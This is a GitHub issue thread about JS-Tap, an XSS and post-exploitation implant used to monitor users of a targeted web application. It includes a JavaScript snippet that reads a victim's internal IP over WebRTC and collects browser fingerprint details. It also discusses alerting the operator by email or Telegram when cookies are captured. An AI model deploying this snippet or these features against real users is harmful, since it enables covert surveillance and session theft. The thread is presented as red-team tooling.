search

hoodoer / JS-Tap

JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients, and a "mimic" feature that automatically generates custom payloads.
The Unlicense
327 stars 33 forks source link

Add additional client enumeration features #6

Closed hoodoer closed 4 months ago

hoodoer commented 6 months ago 
          cool, you are very smart...  now, WebRTC internal LAN ip trick can not runing chrome browser,, but some browser,or android browser can use  webRtc detect  interlan ip,it  is not suitable for all browsers.

but some other code, i can show you are.

// 获取用户内网IP地址
function getUserLocalIPAddress() {
    return new Promise((resolve, reject) => {
        window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
        if (!window.RTCPeerConnection) {
            reject("Your browser does not support RTCPeerConnection");
        }

        const pc = new RTCPeerConnection();
        pc.createDataChannel("");
        pc.createOffer()
            .then(offer => pc.setLocalDescription(offer))
            .catch(err => reject(err));

        pc.onicecandidate = event => {
            if (event.candidate) {
                const ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
                const ipAddress = ipRegex.exec(event.candidate.candidate)[1];
                resolve(ipAddress);
                pc.onicecandidate = null;
                pc.close();
            }
        };
    });
}

// 获取用户CPU、内存、颜色深度、语言、浏览器语言、时区和浏览器插件信息
const clientInfo = {
    cpu: navigator.hardwareConcurrency,
    memory: navigator.deviceMemory,
    colorDepth: screen.colorDepth,
    language: navigator.language,
    browserLanguage: navigator.browserLanguage,
    timeZone: Intl.DateTimeFormat().resolvedOptions().timeZone,
    plugins: Array.from(navigator.plugins).map(plugin => ({
        name: plugin.name,
        filename: plugin.filename
    }))
};

getUserLocalIPAddress()
    .then(ipAddress => {
        clientInfo.localIPAddress = ipAddress;
        console.log(clientInfo);
    })
    .catch(err => console.error(err));

sometime, navigator.plugins can get client install software.(depending browsers)..

Anyway, this is a good project. Adding custom JavaScript functionality and passing information to JavaScript is a better extension that will make your project more popular

Originally posted by @Burpbounty in https://github.com/hoodoer/JS-Tap/issues/4#issuecomment-1956609973

Burpbounty commented 4 months ago

When you add the custom js payload function, it is very easy to use. I often use it during red team penetration testing. Thank you for writing such a good tool. My friend, but I have some suggestions. If it is convenient for you, can you write a function to send logs to email or telegram channels after receiving cookies and other information?

hoodoer commented 4 months ago

Thanks! I'm still planning on working on your enumeration suggestion, I have a ticket for it. Just ben swamped with the auto payload generator, please give that a try sometime and let me know if you have issues.

I like the idea of email based notification, that shouldn't be too hard to pull off.

Besides configuring the tool to send emails, maybe a feature where you select which events you want to be notified for? Or a rollup of different events, if there has been new ones, over the past 24 hours?

Are you looking for immediate notifications, or occasional updates?

Burpbounty commented 4 months ago

If you have any questions about enumeration, you can contact me in time, I will be very happy to communicate with you. In addition to sending emails, telegram bot notifications.

"You can choose which events to be notified", I think "generate new events" is more valuable at this point in time, because when the red team simulated attack and defense, we determined that we would do some operations through js. At this time, timeliness It's very important.

hoodoer commented 4 months ago

I'll see if I can add email notifications soon, I don't know anything about telegram though. I'll have to dig into that a bit.

hoodoer commented 4 months ago

@Burpbounty I just merged an SMTP email notification feature into main. Hopefully no bugs in here, I haven't seen any. You can get emails on new clients, or new clients and client events. There's a delay setting between emails so you don't get spammed to death. Hopefully that helps a bit. Let me know if you have any issues with it, all the SMTP settings are in "App Settings" in the app.

hoodoer commented 4 months ago

@Burpbounty I have yet to see any local IP enumeration features work on any modern browser, I'm afraid this technique is no longer feasible. I have added the optional client fingerprinting in version 2.14. You need to enable it in the js-tap client, and also turn it on in the js-tap portal in app settings to show it.

The client search filter references the fingerprint value, so you can copy and paste it into the filter to show all clients with the same fingerprint. Hope that helps.